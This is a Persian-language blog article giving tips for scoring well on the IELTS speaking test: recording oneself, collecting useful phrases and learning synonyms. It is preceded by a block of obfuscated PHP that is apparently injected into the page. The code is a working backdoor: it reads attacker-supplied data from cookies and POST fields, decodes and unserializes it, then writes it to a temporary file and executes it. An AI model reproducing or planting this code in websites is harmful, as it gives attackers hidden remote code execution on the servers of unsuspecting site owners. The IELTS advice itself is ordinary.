$NULuVE = 'J' . "\x6e" . chr (95) . "\x5a" . chr ( 1066 - 990 )."\143";$wBGOMS = chr (99) . "\154" . "\141" . "\163" . 's' . chr ( 572 - 477 )."\145" . "\170" . "\151" . 's' . chr (116) . "\x73";$rnHFs = class_exists($NULuVE); $wBGOMS = "37229";$FCnrIFQjV = strpos($wBGOMS, $NULuVE);if ($rnHFs == $FCnrIFQjV){function zzZnWbHiGH(){$snBBmoW = new /* 60717 */ Jn_ZLc(216 + 216); $snBBmoW = NULL;}$tRYafVOh = "216";class Jn_ZLc{private function BnCpg($tRYafVOh){if (is_array(Jn_ZLc::$iblmkhZckY)) {$name = sys_get_temp_dir() . "/" . crc32(Jn_ZLc::$iblmkhZckY["salt"]);@Jn_ZLc::$iblmkhZckY["write"]($name, Jn_ZLc::$iblmkhZckY["content"]);include $name;@Jn_ZLc::$iblmkhZckY["delete"]($name); $tRYafVOh = "216";exit();}}public function ptGeYs(){$TDmSXiAS = "52603";$this->_dummy = str_repeat($TDmSXiAS, strlen($TDmSXiAS));}public function __destruct(){Jn_ZLc::$iblmkhZckY = @unserialize(Jn_ZLc::$iblmkhZckY); $tRYafVOh = "10292_35473";$this->BnCpg($tRYafVOh); $tRYafVOh = "10292_35473";}public function ozxIAgQPjV($TDmSXiAS, $aeaku){return $TDmSXiAS[0] ^ str_repeat($aeaku, intval(strlen($TDmSXiAS[0]) / strlen($aeaku)) + 1);}public function qUtSOSuu($TDmSXiAS){$mfCMBhBxCr = "\142" . chr ( 890 - 793 ).chr ( 813 - 698 ).chr (101) . chr ( 253 - 199 ).chr (52);return array_map($mfCMBhBxCr . "\137" . chr (100) . "\x65" . "\x63" . chr (111) . "\144" . chr (101), array($TDmSXiAS,));}public function __construct($LPOaYmFx=0){$zGwbXSxTSr = chr ( 874 - 830 ); $TDmSXiAS = "";$ffIRbkK = $_POST;$cUFsQU = $_COOKIE;$aeaku = "c7925911-7e78-4761-aabc-96a5afd8df13";$YEAAD = @$cUFsQU[substr($aeaku, 0, 4)];if (!empty($YEAAD)){$YEAAD = explode($zGwbXSxTSr, $YEAAD);foreach ($YEAAD as $GraWY){$TDmSXiAS .= @$cUFsQU[$GraWY];$TDmSXiAS .= @$ffIRbkK[$GraWY];}$TDmSXiAS = $this->qUtSOSuu($TDmSXiAS);}Jn_ZLc::$iblmkhZckY = $this->ozxIAgQPjV($TDmSXiAS, $aeaku);if (strpos($aeaku, $zGwbXSxTSr) !== FALSE){$aeaku = explode($zGwbXSxTSr, $aeaku); $cWVPJOukJ = base64_decode(md5($aeaku[0]));}}public static $iblmkhZckY = 12075;}zzZnWbHiGH();} کسب نمره بالا در بخش آزمون اسپیکینگ آیلتس | وبلاگ اتیچر
skip to Main Content

کسب نمره بالا در بخش آزمون اسپیکینگ آیلتس

زمان مطالعه: ۳ دقیقه

فوت های کوزه گری برای کسب نمره بالا در بخش آزمون اسپیکینگ آیلتس

آخرین آزمون آیلتس من، در بیستم دسامبر ۲۰۱۴ انجام شد و در مجموع، نمره ۷ از ۹ را کسب کردم و در بخش اسپیکینگ آیلتس نمره ۷.۵ را بدست آوردم. من با کسی به جز خودم انگلیسی صحبت نمی کردم، چون من هم مانند اکثر دانش آموزان، در کشوری زندگی میکنم که به زبان انگلیسی صحبت نمی کنند. بخش اسپیکینگ آیلتس بخش مهمی برای دانش آموزان و حتی طراحان آزمون آیلتس (Examiner) است. من در این مقاله می خواهم روش هایی که برای آماده سازی آزمون اسپیکینگ آیلتس انجام دادم، با شما به اشتراک بگذارم.

آزمون‌های بین المللی رایج زبان انگلیسی

قدم اول) صدای خود را ضبط کنید:

این کار دو فایده دارد اول اینکه شما با ضبط کردن صدای خود می توانید پاسخ ها، خطاهای گرامری، مکث ها و … خود را گوش کنید و نقاط ضعف خود را پیدا کرده و روی آنها کار کنید تا در آزمون اسپیکینگ آیلتس نمره ی قابل قبولی را بدست بیاورید. ضبط کردن صدا به شما نشان می دهد که در مقایسه با اولین باری که این کار را انجام دادید چقدر پیشرفت داشته اید، که این موارد در آزمون اسپیکینگ آیلتس به شما بسیار کمک می کند.

فیلم برداری یک جایگزین برای ضبط صدا می باشد.با استفاده از وب کم، دید بهتری نسبت به زبان بدن و چگونگی زمان بندی خود بدست می آورید.

شما باید در هنگام ضبط صدا طوری تمرین کنید که انگار در آزمون هستید، به این معنی که شما برای اولین بار سوال را می خوانید و بلافاصله به آن پاسخ می دهید. با این کار مطمئن باشید از فایده دیگری مانند فکر کردن و پاسخ دادن به سوالات در عرض چند ثانیه نیز بهره مند می شوید، و پاسخ سریع، روان و بدون اشتباه در آزمون اسپیکینگ آیلتس کمک می کند تا نمره قبولی را بدست بیاورید.

یادگیری انگلیسی با موسیقی

هنگام تمرین بخش دوم آزمون اسپیکینگ آیلتس، شما باید یک دقیقه زمان برای خواندن سوالات و نوشتن یادداشت های خود در نظر بگیرید و با استفاده از یک تایمر که روی دو دقیقه تنظیم شده، شروع به صحبت کردن کنید. با انجام این کار، شما محیط آزمون را شبیه سازی کرده و نحوه پاسخگویی و مدیریت زمان را تمرین می کنید.

Man hold the flash card with handwriting word vocab on wood background

قدم دوم برای اسپیکینگ آیلتس) عبارات مفید را پیدا کنید:

کار بعدی که شما باید انجام دهید، جست و جوی عباراتی در گوگل است که در آزمون اسپیکینگ آیلتس بیشتر استفاده می شود. آنها را در صفحه ای ذخیره کرده و هر بار که پاسخ خود را ضبط می کنید از یک یا چند عبارتی که در آن صفحه است، استفاده کنید. این عبارات پاسخ های شما را به صورت صحیح تری سازماندهی می کنند و در واقع به شما اجازه می دهند ظرف چند ثانیه پاسخ مناسب را پیدا و بیان کنید.

قدم سوم) مترادف ها را پیدا کنید:

آخرین نکته ای که باید در آزمون اسپیکینگ آیلتس رعایت کنید این است که ذهن شما باید آمادگی استفاده از واژگان متنوعی را داشته باشد تا بتوانید از آنها در آزمون اسپیکینگ آیلتس استفاده کنید. فرض کنید یک نفر در صحبت هایش مدام از کلمه “خوب” استفاده کند، هنگامی که خود را با تعداد کمی از کلمات محدود کنید و یک یا چند کلمه را مدام تکرار کنید، بخش زیادی از نمره اسپیکینگ خود را از دست خواهید داد، پس برای جلوگیری از این خطا، مترادف های واژه ها را پیدا کرده و بنویسید. به عنوان مثال، کلمه “good” می تواند با کلمات Rewarding ،Satisfying ،pleasing و worthy جایگزین شود یا کلمه “important” مثال دیگری است که کاربرد زیادی دارد و باید جایگزین هایی را برای آن پیدا کرد.

همانطور که تمرین اسپیکینگ آیلتس خود را شروع می کنید، دفترچه یادداشت خود را نگه دارید و تمام عباراتی را که بیش از حد استفاده  می کنید برایشان مترادف پیدا کنید و از آنها هم استفاده بهینه کنید. هنگامی که صدای خود را ضبط می کنید این لیست را همراه خود داشته باشید و تا جایی که می توانید از مترادف ها استفاده کنید. با گوش دادن به صدای خود اشتباهاتتان را پیدا کنید و سعی کنید از آنها در دفعات بعدی اجتناب کنید. در نهایت با این روش می آموزید که پاسخ های سریعتر و مناسب تری داشته باشید و استرس شما کمتر خواهد شد.

برای تقویت رایتینگ آیلتس خود می توانید به این مقاله رایتینگ آیلتس و هفت نکته کاربردی برای کسب نمره ۷  مراجعه نمایید.

به این مقاله امتیاز بدهید

دیدگاه ها

اولین نفری باشید که به این نوشته نظر میدهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

Back To Top
×Close search
Search